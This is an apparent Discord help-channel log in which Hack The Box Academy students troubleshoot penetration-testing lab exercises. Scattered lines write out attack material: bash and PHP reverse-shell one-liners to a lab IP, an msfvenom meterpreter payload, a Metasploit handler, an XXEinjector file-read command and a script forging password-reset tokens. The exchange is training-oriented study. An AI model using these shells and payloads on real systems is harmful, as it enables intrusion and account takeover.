#modules

You navigate to https://ip:3389

Er

Whatever thre nessus port is

Sorry I'm half awake on melatonin

Address Not Found

The browser could not find the host server for the provided address.

😏

Don't you dare you cheeky mf

I keep getting this error whenever I try to rdp in when using my kali vm

Try using a different rdp program like remmina

Ok, one moment

Worked, thanks. Any idea why freerdp doesn’t work?

Sometimes it's just dumb

Lol

¯_(ツ)_/¯

Sometimes it just reads the password weird

That’s why I put it within ‘

so when in doubt ill take the password out and wait for it to prompt for pass and then copy paste

Remmina is working fine for me though

yeah sometimes it reads it wrong anyways, I dunno why some weird bug

I like to get xfreerdp when I can though cause of pth and cause of the ability to mount a local folder as a file share. super ez pz file transfer that way.

idk if remmina can do that

I prefer it as well

technically yes

I have 💯 I just need to do report

so officially yes Im still doing the exam, but im not like 'doing' the exam

8 days to write my report feels nice

yeah but im bad at reports

so im glad to have so much time for it lol

You can do pth and mounting with remmina

im going to bed, technically was already in bed but had to check something and got distracted with discord for a sec

sweet will have to check that out later

i was loaded on caffeine and stuff for the exam today so going to bed right now is rough

my brain wouldnt shutup unless I quickly checked up something about ldapmodify

yeah throw insomnia in the mix for me

yup I feel it

I'm honestly about out my legs don't wanna move to get up lol

if remmina work for you that's great but if you to keep using xfreerdp try with the /cert:ignore tag

offtopic but its nice seeing MrTom in green

yea i learn that from one of the old AF machine in offshore or some other prolab

but was hilarious to see him as a blue name just absolutely clowning on pro hackers with superior knowledge and politeness.

i didn't notice that for a good while and i only got the rank because of the seasons 🤣

was wondering why he went quiet for awhile. turned out MrTom was just hyperbolic time chambering supercharging his rank

politeness i agree, superior knowledge absolutely not i'm still dumb 🤣

The last time I tried that I got black screen, but I’ll try later

lets not forget the copious amount of people that cheated to pro hacker specifically

I like saving screenshots of sus questions/answers

I have supreme confidence MrTom did, but some of the pro hackers hes helped? absolutely not lol

me? sure

also were way offtopic now

my bad

It's fine - it's always near silent in here at this hour.

I got pro hacker like 4 years ago, no way I would be able to get it now

Took a break for 3 years or so

oh yeah the disappear thing, a lot of stuff has happened since i was the helping squirrel and i was thinking about being an HTB official, i got in contact with i think the guys that own the academy before i happened and i got ghosted by him 🤣

that tracks

but i may do the academy tutoring thing with jared or become a content writer or something like that for the academy

go rewrite thick application section plz

i'm still not sure what i will do with HTB yet but if i become an HTB official i will recruit you next madf0x 🤣 (and payloadbynny)

lul

could be fun, but id rather get a pentesting position instead

oh yeah i hear that section is worse than the password attack module 🤣

it is

oh really?

I legitimately think it's the worst piece of academy content in all of academy

Consider synack. I just did their assessment, with the CPTS pathway, and it was easy compared to CPTS exam.

and they had to fix thick applications and its still bad

before hand it was literally broken

yeah i did read thoughts that section and it is bad

I thought the same. The wording is really weird on that.

even a staff member was cussing with me on agreeing how bad it is

now its at least completable

Anyone having any issues connecting to PwnBox right now? I keep getting "request validation failed" even after restarting browser and re-sign in to HTB

if you just blindly follow the instructions and turn brain off

some sections are easier with pwnbox

can try asking in #710108839063846964

but yeah most people use VM

ill keep that in mind

wait do did the pwnbox go full circle?? before i think the pwnbox did get some good update the last time i check

yep

eh its not about it being bad, its more just not gunna have the resources or customizability of your own vm

pwnbox is aight, but I wouldn't trade my kali

exactly

and my i3 setup

I used it a lot when we had a crazy slow month at work and I could work on modules during the day but only had work computer

guys i need some help here is there a way to reset your module interface it has become a lot bigger suddenly and wont allow me to filter by tiers anymore

my notes are light but dm the question anyways and maybe ill have it/remember

sweet, soldering can def be fun.

ok i'm back from a chrome crash and yes

sure

The last question of living off the land section from AD enumeration. I managed to get the flag by manually enumerating the users with admin privs, but the hint states it can be done with dsquery and ldap filters, how would that be done? Where would I be able to find those filters?

ldapsearch could do it

and youd prob have to figure out the filter

Question is “utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.”

section has a nice explanation of filters and how to chain them together

so question is basically asking you to craft a custom filter

i use one of the example dsquery command but with the number on user account control bit values image for disabled account like the question asked

i used the example command under Users With Specific Attributes Set (PASSWD_NOTREQD) but that command use 32 for password not required i just change that number to the thing i needed

Yeah I managed to get that to work as well

Using the command provided and changing 32 to 2

yea that is for dsquery but i have no idea how to do it with ldap filters

I believe the ldap filter is included with that

oh yea you could be right (i'm dumb with both)

Since the useracccontrol string is a ldap filter I believe

After finishing the cpts path I will do all of the ad modules

The higher priced ones as well

There’s an ldap and powerview module

wep i have done the ldap module and can't say recommended at the moment

some resource are dead, there is some newer and just other stuff in general to that module is missing and there is i think some bug i has having with the module a while back

Ah alright 😅 that’s unfortunate

Might just do crtp/e or crto then

id suggest taking the time to learn ldapsearch because it forces you to deal with the guts of ldap better than the auto tools or powershell scripts

its a crucible of pain

but its given me an odd feeling of comfort with it even though Ive only scratched the surface

I prefer ldapsearch now

minus DACL enumeration, cause Security descriptors are binary blobs base64 encoded and you need an external tool to decode them into access rights

which made me really sad because that added a barrier to my plan of wanting to figure out how to abuse every DACL permission with ldapmodify

got GenericWrite/GenericAll stuff with it

adding users to group and setting spns

I almost got alh4zr3d to use ldapmodify for Absolute today but then he heard it went with ldapsearch and he had like PTSD and refused to use it and found a diff tool.

What resource did you use to learn it?

combination of the very section you're on, an old PowerPoint slide for a talk introducing windapsearch, and reading the ldapmodify documentation

and then experimenting in academy labs

Did it cause Im stubborn and wanted to reduce my usage of powershell on hosts

its becoming more restricted and monitored

the less you HAVE to use it, the better imo

though obv not every engagement is gunna care

I’ll probably just do the ldap module anyways, even if it’s not as good, it should at least give additional knowledge

Im considering doing it as well.

people say Ive already exceeded it, but thats from clobbering together various scraps and synthesizing some new tricks for myself. So I wanna see what scraps it might have for me.

plus my actual foundational knowledge of ldap is still weak

I agree

Im slowly forming a weird love of it

thats the secret though

AD IS ldap

nope

smb is just windows

super duper minor distinction

Idk if you can have a linux DC, but theoretically you can have an entire AD network with only linux workstations and no samba

just youd have to be insane to set that up

Would also be a warcrime.

smb is just integral to windows, and since AD is windows centric they go together.

but ad and ldap? literally the same thing. Active Directory is just Microsoft's implementation with some ACL sprinkling magic and forced kerberos integration

but a DA with a single ldapmodify command could wipe out and brick the whole domain 🙂

Hi, iam stuck on windows privesc academy in powershell creds for user bob_adm

after i google a lot, my user as htb-student will never cant to decrypt powershell credential for other user

maybe anyone solve it ?

okey thanks then

the password can be retrieved in plain text

with the $decrypted from imclilxml?

Hello im in the pivoting module in skills assement i have a webshell and i want a revershe shell, im using bash -i >& /dev/tcp/10.10.14.168/8080 0>&1 too im trying ``` php -r '$sock=fsockopen("10.10.14.168",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

do you change your username or a new VM?

do you change your network adapter or change your username in htb?

okay

you arent looking in the correct directory

oh yea

thanks

hey what thread is for seasonal boxes

Should be this one here: https://discord.com/channels/473760315293696010/1122224519793365054

i don't have access for lots of thread just give the name

Did you verify your account? If not read the following: https://discord.com/channels/473760315293696010/477042232109826048

hello, as i found here https://stackoverflow.com/questions/54923903/powershell-script-not-working-using-import-clixml-command there is no way to decrypt pscreds for other user due to protection by DPAPI. iam on here and stuck for a long time, can you suggest for another way to retrieve cleartext password for bob_adm ? thanks

there is only one way written in the section that will help you retreive the cleartext password of the user

thanks

is there a default extension that packages take on linux

@fathom pendant thanks for your assistance. Pertaining to Nessus skills assessment, was able access the jump host successfully 😄

I found a lot of file containing word "password"

• and only one file which containing bob_adm under c:\Scr******.txt directory which encrypted the pass.xml
• also found administrator password but cant use the password to login as admin
• as am not an admin, i cant set execution policy bypass to enum pssqlite database

The exercise is solvable, a suggestion that I can give you is to take a break and come back at it later again

Thanks, I already solved it. using GUI to access cleartext. i Just not tried harder before

🔥

wow these look so very good

cant wait till I know enough to do these modules

the Hard ones

30$ module

😭

68$ per 1000 cubes, so that module alone costs 34$ 😭

Guys which is the best language for programming?

In Attack common service easy lab why hydra can’t give me results when brute forcing password user ||fi**||@inlanefregiht.htb ?

Using pws.list from res I can’t find anything 🤔

can you post the command used in spoiler tags?

I’m don’t understand

WHen posting a web request with data, if I want to try run a command why does it use ;ls;?

Instead of ip=ls

Hello Guys

I'm stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS -> ACL Enumeration
Q/ What privileges does the user damundsen have over the Help Desk Level 1 group?

I tired This Unfortunately it doesn't work
PS C:\Tools> $sid = Convert-NameToSid damundsen
PS C:\Tools> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} -

Do you need write my hydra command here?

you need to write it in spolier tags like this if you want ---> ||<command-here>||

otherwise I'll dm you

after completing linux fundamentals module, what should i learn next

do you mean no output?

Theres a different command in the module that will show it

You just need to change the user to damundsen

yah

sorry I don't get it

the command looks fine to me, maybe there is another way to do it as "0x56" is suggesting

There’s a different command used in the module that shows what you need

But in the module that command is used with a different user

Yes, I am surprised why it does not work stuck for 3 hours ):

So change that to damundsen and it’ll show it

You could follow the fundamentals path

Why do they use ;ls; instead of ls?

When sending a POST request

Like modifying the post requet

it was supposed to be ip=1 but in the instructions they changed it to ;ls;

but why not ls=

?

Read from creating a list of domain users, and then the foreach loop, but instead of wley you use damundsen

And if it’s not shown then, you can find the answer under “further enumeration of rights using damundsen” the answer is shown in those rights

Thank you, I really appreciate your effort

You’re welcome 👍🏼

I just finished that part as well

https://academy.hackthebox.com/achievement/710422/51
the updated sections are top notch

AAAAA, to end the previous line then do "ls" then end it

free hack learn

where?

tryhackme or fundamentals modules on hackthebox

hello guys
is there anyway to reset the progress of academy modules?(preferably without having to pay again)

The ; is a shell metacharacter on Unix based systems that allows you to perform inline execution of an injected command within the original command

aaaaaaaaaaaaaaaaaaaaaaaa, thanks

Idk why i thought it was javascript

xd

Hello, stuck on Footprinting (Footprinting Lab Medium). I have logged onto the server, found creds for sa user but unable to authenticate to SQL Server.

Try running as administrator

I thought I’d seen mention of Administrator in previous messages but wasn’t sure if that was sa. So I need to priv esc or get administrator password somehow?

You have everything you need.
There are users out there who use the same password for multiple accounts.

I’ve just DM’d you

Got it thanks!

https://academy.hackthebox.com/achievement/298184/218

Challenging and fun module

ayo am stuck here

Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

Communication with Processes

WINDOWS PRIVILEGE ESCALATION

Which tool can you use to check permissions?

accesschk

?

try it

not working

used this command still not working

accesschk -dqv "\pipe\SQLLocal\SQLEXPRESS01" | findstr "WRITE_DAC"

why -d?
https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

it was for the deapth of the dir ig anyways it looks like this accesschk is not installed lol

accesschk -dqv "\pipe\SQLLocal\SQLEXPRESS01" | findstr "WRITE_DAC"
'accesschk' is not recognized as an internal or external command,
operable program or batch file.

Check the dir C:\Tools

and why this rdp session is closing again and agin this is getting on my nerves am using xfreerdp is there any alternative ?

@acoustic owl ?

idk
Try Remmina or something else

I bought a yearly subscription

The module costs "only" 400 cubes. After finishing the module you get 100 cubes (20%) back 😉
I have taken all the other modules by this author and quite honestly, they were worth the money.

effective cost is 400 cubes, actual cost is 500 cubes.

You still need 500 to buy it in the first place.

anyone know how to use XXEinjector and why it keeps giving me the "wrong HTTP file format" error for the blind data exfiltration module

https://academy.hackthebox.com/module/134/section/1207

Hi, The student package does not allow you to get cubes from solving the questions?

I'm not 100% sure, but I think you can get cubes with it.

throughout ACTIVE DIRECTORY ENUMERATION & ATTACKS Module I didn't get cubs

Okay, maybe the student subscription can't collect cubes, I really don't know.
With the silver annual subscription it was possible at that time to

maybe

Anyone who uses a student subscription ?

Yes you get cubes on student subscription

I am working on Pivoting Tunneling and Port Forwarding/Remote/Reverse Port Forwarding with SSH. Can someone explain why I am getting this error when trying to create my payload with msfvenom?

I am following the example from the module as it says to, but I am not sure what I am doing wrong here.

Is there a space?

seems like so

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

any one up to nudge me? am doing the shells and payloads live engagement and need help with OS identification on host 2. I already got shell on it.

Remove that space

If you have a shell you can get the os

Lhost=<Ip>

i did but the challenge question accepts none of my input as the correct os

and the hint is 'proper scanning avoids poor performance' so i thought nmap -A or -O but no luck

Probably a case of overthinking

The module shows a space, but it wasn't supposed to have one, works now thanks

It's fine, you can report it in erratum if you want

I'd like to reset my progress on the academy modules but can't find the option to do so. Can anyone point me in the right direction? Even the email of a member of staff would be appreciated

You can't

I saw an option "Retake" when I finished the module, but it's same stuff like "View" on dashboard

The retake option isn't there anymore

just view

Unlucky

considered creating a new account but I'd rather not pay for the modules again

You may try to write it to support

But I don't think they would help

Now that I am working on the Pivoting Tunneling, and Port Forwarding... I am extremely happy that I spent two months this winter strictly studying networking(being that I didn't use it much in my SOC role at the time). Without that base, this stuff would be impossible to understand.

do you know their email

Me too at this module, and I already hate it)))

There's a green bubble at the corner of the screen

Just watch out right bottom side in academy website

thankyou everyone : )

Gl

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Maybe a stupid question, but is this actually supposed to be 0.0.0.0, or is it my attack machine IP?

no its ur attack machine 🙂

It's for forwarding

the lhost translates to listening host

that would be your attack machine listening for the reverse shell

I mean from that windows to Ubuntu, then to your attack machine

thought so, just confused why it didn't show any explanation like it says for other IPs (<internalIPofPivotHost>, etc)

I actually didn't understand it properly too, need to read stuff about it

0.0.0.0 means listening on all ports

Er all interfaces

Watch out 2nd question, maybe it will give you a hint

Need to pin it)))

So I do set it to 0.0.0.0?

Yeah

Yes

got it, thanks

Look what happens when you run the http.server python module

0.0.0.0:8123

:)

Ty

That was the simplest explanation 🙂

That means any system on any interface connection can connect to it on that port

Need to take it as note

But computer is far away 😂

does anyone have a copy of the obsidian notebook from the Documentation and Reporting Module Resources? i tried downloading it from the resources but all the supposed pre-populated fields were empty. I think its due to me extracting without the password, but when i try unzipping the compressed zip folder, it doesnt ask me for a password... 😦 maybe im just dumb

I get this info thru the shell, but the challenge still does not accept my answer.. this is such a time waster.

Whats the question?

"Operating system:" may be a start

What distribution of Linux is running on Host-2? (Format: distro name, all lower case)

So ubuntu?

The answer is right there right lol

😂

...i was giving in the version.

bruh

Lol

Ahah

damn it thanks everyone

You’re welcome 👍🏼

The answer is often the simplest

Truth

Lol it's super easy to look over

i tend to screw those ones bad all the time T_T

i mean i see 'whats it running?' I think, OS and version >_< my bad

I hope you are not frustrated now

with my self a lil bit lmfao

you are not the only one ... its the HTB effect, sometimes you need to take a break and comeback at it

Then forget that you were learning))

can I dm anyone in Logrotate section LINUX PRIVILEGE ESCALATION module ?

sure

thanks

https://academy.hackthebox.com/module/113/section/2164 Attacking Common Applications -- Exploiting Web Vulnerabilities in Thick-Client Applications

Someone who completed it please I cannot pass the last step of path traversal

oh boy do i have bad news for you ... I know what you will ask but DM me anyways

finally 1 guy who completed it

yea by the time i completed it ... i look liked your emoticon

7 days trying this module for me

just missing that shit for 3 days

You do not need to compile anything

PS C:\apps\raw> ```

This feeling when there is no error compiling

Did you ever solve this? I'm literally on the box and can read the tomcat-users.xml file and I still can't get the right answer.

finally

Why they thought it is a godd idea to do an insane machine in a slow box and with notepad, in an exercises from medium module and that u need to modify the source code 99 times

Hi anyone Solving WINDOWS PRIIESC MODULES on Miscellaneous section ? any hint for this Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer. ?

Already done restoring htdocs, found creds for administrator but cant used to login as admin. also backup for windows\system32\config did not found SAM and SYSTEM file to pass to secretdump.py . thanks

Hey y'all! I'm new to HTB and Cybersecurity in general, and am having an issue with the 'NTFS vs. Share Permissions' lesson in the 'Windows Fundamentals' module. I've made it to where I'm trying to mount to the share to gain access to the 'Company Data' folder using the following:

sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //ipaddoftarget/"Company Data" /home/user/Desktop/

I was replacing 'ipaddoftarget' with the target IP address for the windows machine, and 'user' in the directory with the Pwnbox username 'htb-***'.

I keep getting the following error in the Pwnbox terminal now:

Refer to the mount.cifs(8) manual page (e.g. man mount.cifs) and kernel log messages (dmesg)```

Any help would be greatly appreciated! I did also run this:

sudo apt-get install cifs-utils

to make sure that everything was installed.

Doing AD Enumeration & Attacks - Skills Assessment Part II: Q4 and used kerbrute to find usernames and found and the intended password for the intended user, but kerebrute passwordspray gives me zero results

Done! Tested 57 logins (0 successes) in 0.197 seconds

@hasty solar Hey I'm struggling with that one as well .Can you drop a hint for me if you get it?

any help is appreciated

Might wanna double check the target IP address, maybe even restart it with a fresh one to make sure. Confirm that file you wanna connect to, make sure it exists. Make sure the credentials are correct(can’t tell you how many times I’ve turned a blind eye on this). Anyways that’s what I would do. Hope you get it!

Thank you very much! I'll try restarting the target box and try that. I'll keep working on it.

Hey everyone ! Can anyone tell me if I need to bruteforce david's password in the lab hard password attack?

Or else can someone give me a clue as to the usefulness of the password in keepass?

You should know Information in keepass to complete your journey in lab

what do you mean?

i cracked the keepass

keepass = database ?

In current user you are using you cant do anything with it so you will think about another way .. once you cracked you will know pass another user

Did you log into the keypass?

yeah sure

So this way to complete your task

Keypass is a password manager

@hasty solar I actually just got it. It's certainly not consistent. At least it wasn't on my end.

ohhh

ok thank you both

The pendulum swings back and forth for those labs

Get to a thing to Crack, do it, get a new thing...

"in the example" means in the section. Doesn't have anything to do with the instance you spawned

trying to xfreerdp into a windows machine in the bloodhound section. just get a blackscreen. ive rebooted and still having the same issue. issue on HTB side or my side?

ive used this command as well with no luck. xfreerdp /v:10.129.201.234 /u:'htb-student' /p:'Academy_student_AD!' /cert-ignore /tls-seclevel:0 /timeout:80000

Press enter when it comes up with black screen

lmao, thanks

Was there ever an erratum on this? I feel like it'd be nice if they added a hint for that. I've seen countless people get stuck at this (myself included)

It's been discussed a ton in this channel lol

Yeah in this one for sure, but haven't seen it in erratum I think (tho I don't check that one as regularly)

Iirc it hasn't been discussed in erratum

Aight I'll write one later today then, thanks 🙂

hi, has some of you already experienced msfconsole stuck on establishing session ?

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 2222
LPORT => 2222
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp
PAYLOAD => linux/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.228:2222 
[*] Command shell session 1 opened (10.10.14.228:2222 -> 10.129.57.62:46394) at 2023-06-26 21:27:06 +0100  <=== am stuck on this, every time I run my elf payload on my target

press enter a couple of times to see if that helps. if it doesn't, check your sessions and try to enter that session in case it simply didnt display properly

copy the request from burp like this:

POST /submitDetails.php HTTP/1.1
Host: 10.129.9.127
Content-Length: 136
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Sec-GPC: 1
Accept-Language: en-US,en
Origin: http://10.129.9.127
Referer: http://10.129.9.127/
Accept-Encoding: gzip, deflate
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

create a file:
nano xxe.req >> paste ..

ruby XXEinjector.rb --host=<your ip> --httpport=<your port> --file=path to xxe.req --path=/etc/passwd --oob=http --phpfilter

example

ruby XXEinjector.rb --host=10.10.11.12 --httpport=1312 --file= /home/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
after all you will see a new directory with name Logs .. inside you will find the log of the file you wanna read ..

im in the same section at the moment try looking for vhosts with ffuf

• pressing Enter does nothing
• hitting Ctrl + z to set the session in background + using sessions -i <id> get me to the exact same place as I was before going to background...

wdym

I discover all with gitlab

ugh well didnt run into that one yet. guess it's time for google/chatgpt

can I dm u?

google didn't helped me... I may give a try to the chatbot

yea

I just finished it

was missing the first question because I didnt know what format they wanted the answer

i need help on questions 5 & 6

well first get the question 5 then the 6

as I told all can be found in the gitlab

ok gona enumerate that

thanks just found the password

Guys I don't understand on the module AD enum : we have to add damundsen on a group called "Help Desk Level 1" with "GenericAll" right but there are two errors :

• damundsen have GenericWrite and not GenericAll
• damundsen is already in the group Help Desk Level 1
  Why?

either perm both gives the ability to add a user to the group you have the rights over

Yay but it is not correct in the course and the user is already in the group so there is no point in doing it again

specifically which section are you on

ACL Abuse Tactics

one moment then

But maybe it was done on purpose for him to already be in the group to answer the question more quickly

idk

Good Day, Does any one get "file created from incompatible collector bloodhound" when using bloodhound-python?

nope but it happens when youre ingestor and your bloodhound are on incompatible versions

so either bloodhound or bloodhound-python is too old for you

hmm i use the one from pwnbox

guess i will need to find another way

yeah confirmed hes already added to the group, odd

oh well

Yes he is, I finished the same section today

not able to find the user :Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

Communication with Processes

WINDOWS PRIVILEGE ESCALATION

Yay, so I did the exercice with another user for fun

the real baller move is to go back, load a tunnel on the host and then complete the section with ldapmodify

This is very odd. I'm in the Windows Priv Escalation module and one of the first questions in the Initial Enumeration section is who is a member of the Backup Operators group. I'm using the provided command and all I get are errors. The command should simply be >net localgroup backup operators, but that isn't working. Anyone else run into this or have any hints to get the command to work?

Do you have it in quotes? "backup operators"

No, I didn't see that mentioned in the lesson. I'll give that a shot.

worked for mw

Thank you! I got it now!

Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

whats up with this

i even entered the all users name

i used accesschk -uwd "NT AUTHORITY\Authenticated Users" \pipe\SQLLocal\SQLEXPRESS01

still didn't worked it says i don't have privilege's ?

getting some "socket error or timeout" errors when running nmap using proxychains (Dynamic Port Forwarding with SSH and SOCKS Tunneling) Pivoting module

can someone please DM ? I believe I am doing something wrong with my command. Although the right line is uncommented I believe

Why do you use the -d flag?

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

i was so fed up i was trying everything lol

these are all the users and non of em are correct 😭

Send me a DM so we don't spoil here.

@acoustic owl 1 question about the attacking common applications

when u completed it u had the skill assessment iii?

Can I DM someone about the Pivoting and Tunneling skills assesment? I am having issues findng the next hop.

I am working on that one right now

are you referring to 2nd question?

never mind

it would be #6

you are talking about the "skills assesment" I am not there yet, but can you help me with the dynamic port fwd part?

i think not, but i am not 100% sure

I finished it but I have zero notes on it

Has anyone done Secure Coding 101: Javascript? Looking to discuss the Encrypted Array chapter, and the 2nd question of the Skill Assessment. 🙂

I have to log in in a windows machine

and complete this question What is the hardcoded password for the database connection in the MultimasterAPI.dll file?

so I think it is about the thick applications part

|| DnSpy || is your Friend in this Case

yea I am using x64dbg and dnspy

but I am getting sure there is nothing in the other ports first

Open the File in ||dnSpy||

oh yeah now I remember why I have zero notes on that section

yeah its like a 4 minute lab if you use the right tool

I have made only one printscreen of this section

yea the lab is too pre-defined

it is the only tool to use

Yes, only one Tool

eh there are others

Yes, RDP

but the one you rec is my favorite

Oh, you mean you can solve it differently. Yes, of course. But you need only one tool on the client to solve the task

correct

https://academy.hackthebox.com/achievement/664482/113

lul

Finally

also many .net apps are genuinely THAT easy irl

I still cannot understand why the decided to add an insane box in the section

but well

theres no insane box in the module

fatty

?

the sections are trash

but not insane

https://academy.hackthebox.com/module/113/section/2164

this section

https://youtu.be/3bvKLj0akMM I had to do it following this video

I just followed the section instructions

the explanation is trash but the steps are correct

didnt know it was carved from an old insane box

If you want to do really difficult things, vautia has developed excellent modules.

step by step lol

I barely can do the active medium machines

The modules marked with the label hard

but you can do em

thats the important part

Don't get confused by such classifications.

also not every segment of a box, even insane ones, are equally as challenging

When is a box/module easy, medium, hard or insane?
Either you can solve it or not. The classification is totally irrelevant

I was watching alh4zr3d do absolute on sunday, and I figured out the first several steps before he did. Doesnt mean I have the skills to finish the whole box like he does though

I have 46/80 modules done for now

nice

keep chugging

when I finish the penetration role path I want repeat it all

just doing the exercises blind

and doing the machines they recommend + the 2 labs

duh! the IP of the machine is given, I was scanning the whole thing, hence, those errors 😂 time for a break, I guess

so long journey, step by step

In this field you will never finish learning

There is always more to learn

so true! ...

that's why I like

Can someone help me with the Skill assessment for module Stack-Based Buffer Overflows on Windows x86? I'm stuck on comparing the bytes and finding bad characters. Any help will be greatly appreciated.

https://academy.hackthebox.com/module/51/section/1592 Linux Privilege Escalation -- Enviroment Enumeration

I have run linpeas and all the commands manually

cannot find any interesting file

In payloadbunnys words " grep is your friend "

Hey there, did you ever solve this?

meh

so they explain all the section to just search the flag with grep

Can confirm I wasted a significant amount of time on this yesterday before coming here and searching for answers and finding it in 0.2 seconds

https://academy.hackthebox.com/module/51/section/1777

Linux Privilege Escalation -- Linux Services & Internals Enumeration

Is the question bugged?

oh interesting new section I havnt done

But it says it is wrong

What is the latest Python version that is installed on the target?

Doing the Gettings Started module in Academy under PenTest path. On the "Service Scanning" section. On the first question for the exercises is asks for the version number of a service running on a specified port. I've enter the version number a million different ways and it hasn't been accepted. I used the hint to see if it gave a different way to pull the version number that spit it out in another format that it expected -- but the hint method doesnt even show the version number. Can anyone give me maybe an "x.x.x" or "xxxxxxx x.x.xx" so I know I'm barking up the right or wrong tree here?

https://academy.hackthebox.com/module/77/section/726

direct link for the module

Nah not bugged
Check the installed packages with command from the lesson

I can DM my output/version I pulled to verify.. its a super simple exercise/enumeration.. just a formatting issue for submitting the question?

probably a format thing, Im not a fan of the question, feel free to dm what you tried

I used that one already

it was the first I used

Oki u got it?

DM'ed

yea

I was writing the exact version

Can someone help me with the Skill assessment for module Stack-Based Buffer Overflows on Windows x86? I'm stuck on comparing the bytes and finding bad characters. is this module broken?

Hey all were can I get tech support for HTB academy

Green Bubble

The green bubble on the right bottom corner

yeah I dont have that I keep getting a pop up of Adblocker detected and I cant get rid of it in Google chrome

try firefox

oh ok

we are go

all good

👍

Can someone help me with the Skill assessment for module Stack-Based Buffer Overflows on Windows x86? I'm stuck on comparing the bytes and finding bad characters. is this module broken?

Hey everyone. I am doing the file transfer module. I am attempting to practice some of the upload and download methods from the linux transferring files section but whenever I use wget or curl I am receiving an error that the github host could not be resolved. Has anyone ran into this issue.

The machines in the modules do not have access to the Internet

😆 youre kidding me.....

Welp there goes hours down the drain.

I appreciate it the insight!

I was going though the sqlmap course as a refresher, can anyone help me figure out the setting to pipe sqlmap through burp? I am using the --proxy flag but cannot get it to work. Thanks!

i'm having trouble with the ids evasion with nmap hard module. i've done a full -p- and used --source-port 53 but i can't get versions

Hello,
In Socks over RDP, when I use mstsc.exe (as administrator) with IP 172.16.6.155 and user jason, I do not even reach the password box. It says the remote computer is turned off or remote access is turned off or it is not available on the network.
I already respinned the target.

I also tried with 172.16.5.155 since the .6 since inconsistent with the network.

*seems inconsistent

thx, but is the IP right? It does not look consistent with the network?

Deactivate Real-time protection
If you do not, the DLL will be deleted.

Thank you.

anyone having issues with vpn connectivity today?

mine keeps dropping

Are you using TCP for VPN?

@acoustic owl

Im facing an issue with the osticket part in attacking common applications. Both credentials in the sensitive data exposure for both email / user name dont work on the agent login page. I have restarted my instance a few times too and it still doesnt work

UDP

I'd switch to TCP. It's much more stable.

yes, but for example when i switch to TCP, nikto for example will take around 15-20 minutes to complete, everything becomes really slow. but i will switch to TCP again and check

Require some help for Broken Authentication - Predictable Reset Token https://academy.hackthebox.com/module/80/section/779
Question: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

Key points I did:
||1. Use server time (in milliseconds) --> I tried extracting using 2 methods: First, send a post request with submit:htbuser to get the success token reset page. Then get the "Date Response Header" or in my second method: the time specified in the html code using regex/beautifulsoup. I also tried manually clicking reset token and then calculating the epoch
2. Range from time - 1000 to time + 1000 (i did a little more in case, 2000ms)
3. Prepend with "htbadmin" as per the OpenMeeting bug in the notes

for x in range(start_time, now + 1):
# get token md5
total_str = "htbadmin"+str(x)
md5_token = md5(total_str.encode()).hexdigest()

The rest of the code is as per the template code

For a sanity, I tried the above steps using the prepend "htbuser" and tried to match the md5 hash I got from the website, but none of the 4000 hashes matched||

Your encryption looks fine, you probably have to mess around with the epoch time

yeah swiched to TCP, scans are slower, but the VPN is stable. thanks

GTFOBins :0

Thanks. It worked.

Hello all,
i am new to this domain, i working on the WEB REQUEST path POST module when i try to send the await fetch('/search.php', {
method : 'POST',
headers : {
'Content-Type':'application/json'
},
body :JSON.stringify({'search':'london'}),
});
i got the response
but when i try the
fetch('/search.php', {
method : 'POST',
headers : {
'Content-Type':'application/json'
},
body :JSON.stringify({'search':'flag'}),
});
i got nothing,only empty array

how will i solve this issue

Are you sure powerview freezes? It does take a REALLY long time to run.

Did you finish Secure Coding?

It's been a few months since I did the module, so I can't say for sure. While there are a lot of things that will show up on both, some things will only show up in powerview.

but when doing some of the object ACL enumeration, it can easily take 5+ minutes.

It's not necessarily even the speed of the machine, but the sheer number of objects that it goes over. The bigger the forest, the slower it will be.

If you do plan to use any of the commands involving Get-DomainObjectACL -Identity *, I would recommend instead just dumping those results to a variable, and then piping the variable to any of the other functions. That way, you can just use the same data, without having to wait again.

Does anyone know what this does grep -v "false\ |nologin"

I know grep -v makes it not include some lines

But what exactly is "false\ |nologin"

You can exclude more than one thing with the pipe. In this case, both the words false and nologin (users that don't have a shell on login)

ok why not just false|nologin then?

what does \ do

Couldn't we instead do, grep -v "false" | grep -v "nologin"

You have to use backslash to escape the pipe, so that grep knows that you're looking for multiple strings, and not to 'look' for pipes. You could use the method you suggested just the same, it's just less efficient.

ok gotcha thanks

can someone help me with wfuzz im running it in the broken authentication module, and i keep getting errors saying the number of payloads doesn't match the number of FUZZ but i need a payload for my username and my passwordlist. I've tried doing it from the cheatsheet provided and if i do that it says i have TOO many arguements.

i am doing the VULNERABILITY ASSESSMENT module and im just stuck as what needs to be done.

https://academy.hackthebox.com/module/108/section/1233

